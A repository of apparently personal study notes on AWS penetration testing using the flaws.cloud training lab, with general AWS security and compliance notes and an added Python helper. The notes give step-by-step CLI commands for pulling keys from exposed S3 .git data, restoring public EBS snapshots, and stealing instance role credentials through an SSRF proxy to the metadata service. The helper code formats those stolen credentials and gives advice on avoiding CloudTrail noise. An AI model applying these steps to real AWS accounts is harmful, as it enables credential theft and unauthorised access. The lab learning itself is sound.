├── aws-best-security-practices.txt
├── README.md
├── aws-testing.txt
└── aws-security-and-complicance-notes.txt

/aws-best-security-practices.txt:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# aws-testing-notes
Notes as I learn basic AWS penetration testing.
I am using http://flaws.cloud/ to learn these common misconfigurations and issues.
This will help me further understand AWS and how AWS security works.
--------------------------------------------------------------------------------

/aws-testing.txt:
--------------------------------------------------------------------------------
1.) Getting the region and type of instance
  - Use DNS entries: dig +short flaws.cloud
  - Reverse-resolve the IP you got; the PTR record gives up the service type and region (for an S3 static website it is an s3-website-REGION.amazonaws.com host): nslookup IP-FROM-DIG

2.) Querying S3 buckets
  - You can use the CLI; the bucket name is the site's hostname and the region is the one found in step 1: aws s3 ls s3://flaws.cloud/ --no-sign-request --region REGION
    + --no-sign-request: disables request signing, so no credentials are loaded (tests what an anonymous user can see)

3.) Look for creds in buckets (a .git/ directory is left behind quite often)
  - If I have list and read access I can pull the .git/ if there is one.
  - List everything, recursively: aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --recursive
  - To get the git data: aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git ./git --recursive
  - Walk the history with git (point it at ./git with --git-dir): a key that was "removed" in a later commit is still in the earlier one.
  - Once I have credentials I can create a profile with them: aws configure --profile flaws
  - Then view all of their buckets: aws --profile flaws s3 ls

4.) Use the key to get user information
  - Who does this key belong to (account ID, user ID, ARN): aws --profile flaws sts get-caller-identity
  - List the snapshots owned by that account ID: aws --profile flaws ec2 describe-snapshots --owner-id 975426262029 --region REGION
  - Is the snapshot open to everyone?: aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws --region REGION
  - If CreateVolumePermissions contains Group: all, then yes, anyone (including my own account) can create a volume from the snapshot; a UserId entry means it is shared with that one account only

5.) Use the key to get the public snapshot
  - Create a volume from the public snapshot, in my own account, in an AZ of the same region the snapshot lives in: aws ec2 create-volume --availability-zone AZ --region REGION --snapshot-id snap-0b49342abd1bdcb89
  - Attach the volume to an instance I control: aws ec2 attach-volume --volume-id vol-0b5715a658be546c5 --instance-id i-058ad74f95e9d9050 --device /dev/sdf
  - SSH in, mount the new device and take a look at the volume (find important files/passwords/keys/source)

6.) Get metadata through an HTTP proxy on the EC2 instance
  - Every EC2 instance can reach the instance metadata service at http://169.254.169.254/ (link-local, normally reachable only from the instance itself)
  - Use the proxy to request the metadata service and grab the instance role's temporary credentials: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
  - The response carries AccessKeyId, SecretAccessKey and Token; all three are needed (the Token goes into aws_session_token in the profile, aws configure does not prompt for it) and they expire at the Expiration time
  - Use these creds to access buckets you were not supposed to access!
  - This only works because the instance serves IMDSv1; IMDSv2 requires a PUT to obtain a session token first, which a plain GET through a proxy cannot do

7.) The SecurityAudit policy can give out lots of information
  - Get user information: aws --profile lvl6 iam get-user
  - Get the user's attached policies: aws --profile lvl6 iam list-attached-user-policies --user-name Level6
  - Get information about a policy: aws --profile lvl6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit
    + get-policy only returns metadata, including DefaultVersionId; the actual statements come from iam get-policy-version with that version ID
  - If a policy allows you to list API endpoints, you can query the different functions and they may give away information.
  - List Lambda functions: aws --profile lvl6 lambda list-functions
  - Get a function's resource-based policy, which shows who may invoke it (here an API Gateway REST API, identified by its rest-api-id): aws --profile lvl6 lambda get-policy --function-name Level6
  - List that API's stages; the stage name is part of the execute-api invoke URL for the function: aws --profile lvl6 apigateway get-stages --rest-api-id "s33ppypa75"
--------------------------------------------------------------------------------

/aws-security-and-complicance-notes.txt:
--------------------------------------------------------------------------------
Security of the AWS infrastructure
- AWS operates under a shared security responsibility model
- You are responsible for securing the workloads you deploy; AWS is responsible for the security of the underlying cloud infrastructure
- This gives you the flexibility and agility to implement the security controls that apply to you
- Structure:
  You handle:
  + Customer apps & content
  -------------------------
  + Network security
  + Inventory & config
  + Data security
  + AC (access control)
  -------------------------
  AWS handles:
  + AWS Foundation Services
    -> Compute
    -> Storage
    -> Database
    -> Networking
  ------------------------
  + AWS Global Infrastructure:
    -> Availability Zones
    -> Regions
    -> Edge Locations

Security Products and Features
- AWS and its partners offer a wide range of tools for security objectives.
- Network Security
  + Built-in firewalls (security groups and network ACLs) that let you create private networks within AWS and control network access to your instances and subnets
  + Encryption with TLS across all services
  + Connectivity options that enable private or dedicated connections from wherever you are
  + DDoS mitigation technology as part of your auto scaling or content delivery strategy (CDS).
- Inventory and Configuration Management
  + Deployment tools to manage the creation and decommissioning of AWS resources according to organization standards
  + Inventory and configuration management tools to identify AWS resources and then track and manage changes to those resources over time
  + Template definition and management tools to create standard, preconfigured, hardened VM images (AMIs) for EC2 instances
- Data Encryption
  + Encryption adds an extra layer of security to your cloud data
  + Data encryption capabilities are available in AWS storage and database services, such as EBS, S3, Glacier, Oracle RDS, SQL Server RDS and Redshift
  + Flexible key management options let you choose whether AWS manages the keys or you keep control over them
  + There are also dedicated, hardware-based cryptographic key storage options (HSMs) for customers who need them to satisfy compliance requirements
  + You can integrate encryption and data protection into the services you create/deploy using an API
- Access Control
  + AWS offers capabilities to define, enforce and manage user access policies across AWS services
  + Identity and access management capabilities to define individual user accounts with permissions across AWS resources
  + Multi-factor authentication for privileged accounts, including options for hardware-based authenticators
  + Integration and federation with corporate directories to reduce administrative overhead and improve the end-user experience
  + AWS provides native identity and access management integration across many services, and API integration with your own apps/services
- Monitoring and Logging
  + AWS provides tools and features that let you see what is going on in your environment
    -> Deep visibility into API calls: who made them, what was called, when, and from where
    -> Log aggregation options that streamline investigations and compliance reporting
    -> Notifications when events occur or thresholds are exceeded
  + These tools and features give the visibility needed to spot issues before they impact the business, and let you improve your security posture and reduce the risks in your environment

Security Guidance
- AWS provides customers with guidance and expertise through online tools, resources, support and professional services provided by AWS and its partners.
- AWS Trusted Advisor
  + An online tool that acts like a customized cloud expert; it helps you configure your resources and follow best practices
  + It inspects your AWS environment and helps close security gaps. It also finds ways to save money, improve system performance and increase reliability
- AWS Account Teams
  + Can guide you through deployment and implementation, and point you toward resources that can help resolve security issues
- AWS Enterprise Support
  + Provides a 15-minute response time and is available 24/7 by phone, chat or email.
  + You also get a dedicated Technical Account Manager, which helps ensure customers' issues are addressed swiftly
- AWS Professional Services and AWS Partner Network
  + Help customers develop security policies and procedures based on well-proven designs.
  + Ensure customers' security design meets internal and external compliance requirements.
  + The AWS Partner Network has hundreds of certified AWS Consulting Partners worldwide to help customers with their security and compliance needs
- AWS Advisories and Bulletins
  + AWS publishes advisories about current vulnerabilities and threats, and lets customers work with AWS security experts on concerns such as reporting abuse, reporting vulnerabilities, and penetration testing

Compliance
- AWS environments are continually audited to make sure everything is up to standard
- AWS is fully compliant with EU data protection laws
- AWS lets you take advantage of automated tools like AWS Config and AWS CloudTrail for validating compliance
- These tools can reduce the effort needed to perform audits
--------------------------------------------------------------------------------
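Worked example for the checks in aws-testing.txt above (steps 4, 6 and 7). This is an added example, not code from the original notes or from flaws.cloud: three small functions that take the parsed JSON the CLI or the metadata service returns and answer the question each step asks, so the decision (public snapshot? usable credentials? which API calls will the policy let me make?) is made from the real response shape instead of by eyeballing it. The sample responses, the snapshot and account IDs in them, the "flaws" profile name and the credential values are all constructed for this example; the policy evaluator deliberately ignores Resource, Condition and NotAction.

```python
# Added example (not part of the original notes): offline helpers for the checks in
# aws-testing.txt. Each function takes the parsed JSON that the matching command prints,
# so real output can be fed in with json.load(); the sample documents at the bottom are
# constructed for this example and contain no real flaws.cloud data.
from fnmatch import fnmatchcase


def snapshot_is_public(attr):
    """Step 4: output of `aws ec2 describe-snapshot-attribute --attribute createVolumePermission`.
    Anyone can restore the snapshot when some CreateVolumePermissions entry is {"Group": "all"};
    entries carrying a UserId share it with that one account only."""
    return any(p.get("Group") == "all" for p in attr.get("CreateVolumePermissions", []))


def snapshot_shared_with(attr):
    """Account IDs a snapshot is explicitly shared with (empty for private or public snapshots)."""
    return [p["UserId"] for p in attr.get("CreateVolumePermissions", []) if "UserId" in p]


def imds_to_profile(creds, profile):
    """Step 6: JSON from http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
    rendered as a ~/.aws/credentials section. Role credentials are temporary, so the Token must
    be written as aws_session_token: `aws configure` never asks for it, and the key pair on its
    own is rejected by AWS."""
    if creds.get("Code") != "Success":
        raise ValueError("IMDS returned no credentials: %r" % creds.get("Code"))
    return "[%s]\naws_access_key_id = %s\naws_secret_access_key = %s\naws_session_token = %s\n" % (
        profile, creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"])


def _as_list(value):
    """IAM allows either a single string or a list for Statement and Action."""
    return value if isinstance(value, list) else [value]


def policy_allows(document, action):
    """Step 7: evaluate the policy document from `aws iam get-policy-version` for one action,
    the way the notes use it (which read-only API calls will work?). Resource and Condition are
    ignored and NotAction is not handled. Action patterns match case-insensitively with * and ?
    wildcards; an explicit Deny beats any Allow; no matching statement is an implicit deny."""
    allowed = False
    for statement in _as_list(document.get("Statement", [])):
        patterns = [p.lower() for p in _as_list(statement.get("Action", []))]
        if not any(fnmatchcase(action.lower(), p) for p in patterns):
            continue
        if statement.get("Effect") == "Deny":
            return False
        if statement.get("Effect") == "Allow":
            allowed = True
    return allowed


# Constructed sample responses, shaped like the real CLI / IMDS output (fake IDs and secrets).
PUBLIC_SNAPSHOT = {"SnapshotId": "snap-0123456789abcdef0",
                   "CreateVolumePermissions": [{"Group": "all"}], "ProductCodes": []}
SHARED_SNAPSHOT = {"SnapshotId": "snap-0fedcba9876543210",
                   "CreateVolumePermissions": [{"UserId": "111122223333"}], "ProductCodes": []}
IMDS_RESPONSE = {"Code": "Success", "LastUpdated": "2024-01-01T00:00:00Z", "Type": "AWS-HMAC",
                 "AccessKeyId": "ASIAEXAMPLEEXAMPLE00", "SecretAccessKey": "example-secret",
                 "Token": "example-session-token", "Expiration": "2024-01-01T06:00:00Z"}
AUDIT_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["lambda:List*", "lambda:GetPolicy", "apigateway:GET"], "Resource": "*"},
    {"Effect": "Deny", "Action": "lambda:GetFunction", "Resource": "*"}]}

if __name__ == "__main__":
    print("public:", snapshot_is_public(PUBLIC_SNAPSHOT), "shared with:", snapshot_shared_with(SHARED_SNAPSHOT))
    print(imds_to_profile(IMDS_RESPONSE, "flaws"))
    for act in ("lambda:ListFunctions", "lambda:GetFunction", "apigateway:GET", "s3:ListAllMyBuckets"):
        print(act, "->", "allowed" if policy_allows(AUDIT_POLICY, act) else "denied")
```

The profile text from imds_to_profile can be appended to ~/.aws/credentials and used with --profile exactly as in step 3; if the CLI starts returning authentication errors some hours later, the Expiration in the original response has passed and the credentials have to be fetched through the proxy again. For policy_allows, run it over every action you intend to call (lambda:ListFunctions, lambda:GetPolicy, apigateway:GET, ...) before making noise in CloudTrail with calls the policy would deny anyway.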